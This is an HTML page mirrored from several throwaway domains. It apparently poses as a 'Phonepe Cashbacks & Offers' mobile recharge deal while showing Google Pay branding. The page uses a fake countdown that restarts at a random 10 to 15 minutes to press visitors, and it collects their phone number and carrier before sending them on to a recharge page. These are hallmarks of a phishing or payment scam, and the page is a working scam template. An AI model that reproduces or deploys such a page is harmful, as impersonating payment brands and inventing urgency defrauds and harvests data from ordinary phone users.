
<!doctype html>
<html lang="en">


<!-- Mirrored from vi.zondy.shop/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 11 Aug 2024 05:06:14 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from ji.gazeettee.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Aug 2024 04:56:34 GMT -->

<!-- Mirrored from independence-offers.shop/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Aug 2024 06:33:12 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
    <link rel="icon" href="favicon.png">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#000000">
    <meta name="description" content="Web site created using create-react-app">
    <link rel="apple-touch-icon" href="favicon.png">
    <title>Phonepe Cashbacks & Offers</title>
    <script defer="defer" src="js/custom.js"></script>
    <link href="css/main.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/brands.min.css">

    
<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '976063856940763');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=976063856940763&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code --><!-- Meta Pixel Code -->

<body>

    <div class=" px-6 bg-white flex items-center justify-between border-b border-slate-100 mb-0">
        <div class="nav-main" style="display: flex; gap: 20px;">
            <img style="width: 25px; height: 25px; margin-top: 35px;" src="media/download.svg" alt="">
            <img class="goog" style="width: 150px; height: 100px; " src="media/Google-Pay-logo.png" alt="" class="h-8">
        </div>
        <div><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512"
            style="color: #0000FF;" height="30" width="30" xmlns="http://www.w3.org/2000/svg">
            <path
                d="M399 384.2C376.9 345.8 335.4 320 288 320H224c-47.4 0-88.9 25.8-111 64.2c35.2 39.2 86.2 63.8 143 63.8s107.8-24.7 143-63.8zM0 256a256 256 0 1 1 512 0A256 256 0 1 1 0 256zm256 16a72 72 0 1 0 0-144 72 72 0 1 0 0 144z">
            </path>
        </svg>
        </div>
    </div>


    <div class="bg-slate-100">
        <div class="px-2">
            <div>
                <div class="swiper swiper-initialized swiper-horizontal mt-2 swiper-backface-hidden">
                    <div class="swiper-wrapper"
                        style="transition-duration: 0ms; transform: translate3d(0px, 0px, 0px); transition-delay: 0ms;">
                        <div class="swiper-slide swiper-slide-active" style="width: 100%; margin-right: 10px;">
                            <img
                                src="media/Google-Pay-Recharge-Offer.png.webp" style="width: 100%;" alt="" class="rounded-xl"></div>
                        
                    </div>
                </div>
            </div>
        </div>
        <div>
        <div class="flex items-center justify-center py-1 px-4 mt-2 bg-white text-[13px]">
            <div class="text-slate-700 mr-2">Special Offer Ends In:</div>
            <div id="countdown" class="text-slate-700 flex items-center">
                <svg stroke="currentColor" fill="currentColor"
                    stroke-width="0" viewBox="0 0 512 512" class="mr-[2px] mt-[1px]" height="1em" width="1em"
                    xmlns="http://www.w3.org/2000/svg">
                    <path
                        d="M256,8C119,8,8,119,8,256S119,504,256,504,504,393,504,256,393,8,256,8Zm92.49,313h0l-20,25a16,16,0,0,1-22.49,2.5h0l-67-49.72a40,40,0,0,1-15-31.23V112a16,16,0,0,1,16-16h32a16,16,0,0,1,16,16V256l58,42.5A16,16,0,0,1,348.49,321Z">
                    </path>
                </svg>
                <span id="time">00:00:00</span>
            </div>
        </div>
    </div>
    <script>
        // Generate a random number between 10 and 15 for the starting minutes
        const randomMinutes = Math.floor(Math.random() * 6) + 10; // Random number between 10 and 15

        // Set the end time for the countdown based on the random minutes
        const endTime = new Date(Date.now() + randomMinutes * 60 * 1000).getTime();

        function updateCountdown() {
            const now = new Date().getTime();
            const distance = endTime - now;

            const minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
            const seconds = Math.floor((distance % (1000 * 60)) / 1000);

            document.getElementById("time").textContent = `${minutes.toString().padStart(2, '0')}:${seconds.toString().padStart(2, '0')}`;

            // If the countdown is over, display "EXPIRED"
            if (distance < 0) {
                clearInterval(interval);
                document.getElementById("time").textContent = "EXPIRED";
            }
        }

        // Update the countdown every second
        const interval = setInterval(updateCountdown, 1000);
        updateCountdown(); // Initialize the first call immediately
    </script>
<div class="py-10 px-5">
    <div class="bg-white border border-slate-200 rounded-xl py-4 px-6">
        <div style="color: #0000FF; margin-top: 20px;" class="flex items-center text-[17px] font-bold w-fit mx-auto mb-8">
            <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="30" width="30"
                xmlns="http://www.w3.org/2000/svg">
                <path d="M6 2H18C18.5523 2 19 2.44772 19 3V21C19 21.5523 18.5523 22 18 22H6C5.44772 22 5 21.5523 5 21V3C5 2.44772 5.44772 2 6 2ZM12 17C11.4477 17 11 17.4477 11 18C11 18.5523 11.4477 19 12 19C12.5523 19 13 18.5523 13 18C13 17.4477 12.5523 17 12 17Z"></path>
            </svg><span>Mobile Recharge</span>
        </div>
        
        
        
        <form id="rechargeForm">
            <label class="text-[13px] ml-1 font-bold mt-5">Select Network Provider</label>
            <div class="mt-2 flex justify-between text-[#5858fe] text-[14px] font-bold">
                <div class="border-2 border-[#5858fe] rounded px-2 py-1">
                    <input type="radio" id="jio" name="r1" class="mr-1 mt-1" value="jio" checked="">
                    <label for="jio" style="color: #5858fe;">Jio</label>
                </div>
                <div class="border-2 border-[#5858fe] rounded px-2 py-1">
                    <input type="radio" id="airtel" name="r1" class="mr-1 mt-1" value="airtel">
                    <label for="airtel" style="color: #5858fe;">Airtel</label>
                </div>
                <div class="border-2 border-[#5858fe] rounded px-2 py-1">
                    <input type="radio" id="vi" name="r1" class="mr-1 mt-1" value="vi">
                    <label for="vi" style="color: #5858fe;">VI</label>
                </div>
                <div class="border-2 border-[#5858fe] rounded px-2 py-1">
                    <input type="radio" id="bsnl" name="r1" class="mr-1 mt-1" value="bsnl">
                    <label for="bsnl" style="color: #5858fe;">Bsnl</label>
                </div>
            </div>
            <div class="mt-3">
                <label class="text-[13px] ml-1 font-bold">Mobile Number</label>
                <input type="number" id="mobileNumber" name="number" placeholder="+91 xxxxx xxxxx"
                    class="bg-white mt-1 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5"
                    required="">
            </div>
            <div class="mt-1" style="color: #ff0000;font-size :11px;" id="errTxt"></div>
            <div class="delight">
                <h1 class="per">%</h1>
                <p>Recharge with a rs149 plan for a month full of digital delights</p>
            </div>
            
          <div class="mt-5">
        <button type="button" id="rechargeBtn" class="show-button bg-[#5858fe] py-3 w-full text-[15px] rounded-xl font-bold text-white">
            Get Offer
        </button>
    </div>
        </form>
    </div>
</div>

<script>
    document.getElementById("rechargeBtn").addEventListener("click", function() {
        const selectedProvider = document.querySelector('input[name="r1"]:checked').value;
        const mobileNumber = document.getElementById("mobileNumber").value;
        const errTxt = document.getElementById("errTxt");
        let redirectUrl = "";

        switch (selectedProvider) {
            case "jio":
                redirectUrl = "recharge.html";
                break;
            case "airtel":
                redirectUrl = "recharge.html";
                break;
            case "vi":
                redirectUrl = "recharge.html";
                break;
            case "bsnl":
                redirectUrl = "recharge.html";
                break;
            case "mtnl":
                redirectUrl = "recharge.html";
                break;    
            default:
                redirectUrl = "index-3.html"; // Fallback URL if no provider is selected
        }

        if(String(mobileNumber).length == 10){
            // Redirect with mobile number and selected provider as query parameters
            localStorage.setItem('numberr',encodeURIComponent(mobileNumber));
            localStorage.setItem('providerr',encodeURIComponent(selectedProvider));
            window.location.href = `${redirectUrl}?number=${encodeURIComponent(mobileNumber)}&provider=${encodeURIComponent(selectedProvider)}`;
        }else{
            errTxt.innerHTML = 'Enter Valid Number!'
        }
    });



// script.js




</script>



        <img src="media/WhatsApp Image 2024-09-14 at 12.21.55_8a566cd7.jpg" alt="" class="mt-3">
    </div>
    <div></div>
    </div>
</body>

<!-- Mirrored from vi.zondy.shop/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 11 Aug 2024 05:06:16 GMT -->

<!-- Mirrored from ji.gazeettee.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Aug 2024 04:56:37 GMT -->

<!-- Mirrored from independence-offers.shop/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 13 Aug 2024 06:33:14 GMT -->
</html>
